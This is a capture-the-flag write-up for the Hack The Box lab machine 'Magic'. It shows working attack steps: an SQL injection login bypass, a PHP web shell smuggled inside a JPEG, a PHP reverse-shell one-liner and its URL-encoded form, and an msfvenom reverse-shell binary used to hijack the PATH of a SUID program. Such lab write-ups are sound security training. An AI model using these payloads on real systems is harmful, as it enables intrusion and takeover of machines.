Hack The Box — Magic Write-up

Summary

Magic is a Linux box of medium difficulty from Hack The Box platform that was retired at 22 August 2020 at 19:00:00 UTC. This box offers interesting attack vectors to exploit like SQL Injection, PHP code injection into image file and more.

Scanning and Enumeration

After adding an entry in our /etc/hosts file, we perform a typical scanning to check which ports are open.

$ports=$(sudo nmap -p- --min-rate=1000 -T4 magic.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$sudo nmap -p$ports -T4 -Pn -A magic.htb

This reveals an OpenSSH 7.6p1 server running on port 22 and Apache httpd 2.4.29 on port 80.

From the main page, we can see a login page pointing to http://magic.htb/login.php.

After some basic SQL Injection, it was found that this form is vulnerable to this kind of attack. We are able to bypass the authentication mechanism by injecting the following value into username input field:

admin' AND 1234 = 1234 -- abc

Once logged in, we get access to a page that allows us to upload images to the website.

Getting a Foothold

Since we are now able to upload files to the server, our next goal should be upload a backdoor to it so we could interact with the system.

This stage was somewhat of trial and error, because the server performs some input validation on file upload. For instance, just sending a PHP file with double extension like backdoor.php.jpg or simply tampering with HTTP Header won’t work.

One approach that works for this target is injecting PHP code into a JPEG image in order to exploit a flaw in the PHP-GD built-in function, imagecreatefromjpeg(). This approach is better described here, and a tool to accomplish that can be found at https://github.com/dlegs/php-jpeg-injector.

Having an image to infect, run something like:

python gd-jpeg.py cat.jpg '<?php if(isset($_REQUEST["cmd"])){echo "<pre>";$cmd = ($_REQUEST["cmd"]);system($cmd);echo "</pre>";die;}?>' magic-cat.php.jpg

After uploading magic-cat.php.jpg to the server, we can run arbitrary commands passed as value to parameter cmd, for instance:

http://magic.htb/images/uploads/magic-cat.php.jpg?cmd=whoami.

To get a reverse shell from target to our machine, we could run

php -r '$sock=fsockopen("10.10.15.15",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Before we submit this command to our web shell though, we should encode it as follows:

$hURL -U -f url
Original file :: url
URL ENcoded   :: php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

The final URL is then: http://magic.htb/images/uploads/magic-cat.php.jpg?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.

Sending this request to the server gives us a shell as user www-data.

Owning User

With some basic filesystem enumeration, we can find a file named file.sql containing the following line: INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');

Besides, looking at either /home directory or /etc/passwd file, we see that there is a user called theseus in the system.

Simply run su theseus and provide the password Th3s3usW4sK1ng to own user and get your flag: de****************************14.

Owning System

By enumerating the system a little more, we can find a SUID binary file at /bin/sysinfo for which we have execution permission. This is a compiled program that shows us some system information.

Running strings on that file shows that it calls several system command line tools without specifying their full path. Thus, we can change our PATH environment variable by adding /tmp at the beginning and plant a malicious file in there with the same name as one of the tools called by sysinfo.

For that task, we first create a payload with msfvenom:

$msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.15.15 LPORT=5555 -f elf > free

Then, we upload this binary to target /tmp directory and execute /bin/sysinfo. Now, instead of the program executes the system free command, which shows information about system memory, it will actually execute our malicious file placed at /tmp/free, giving us a root shell.

Enjoy your root flag 76****************************5a!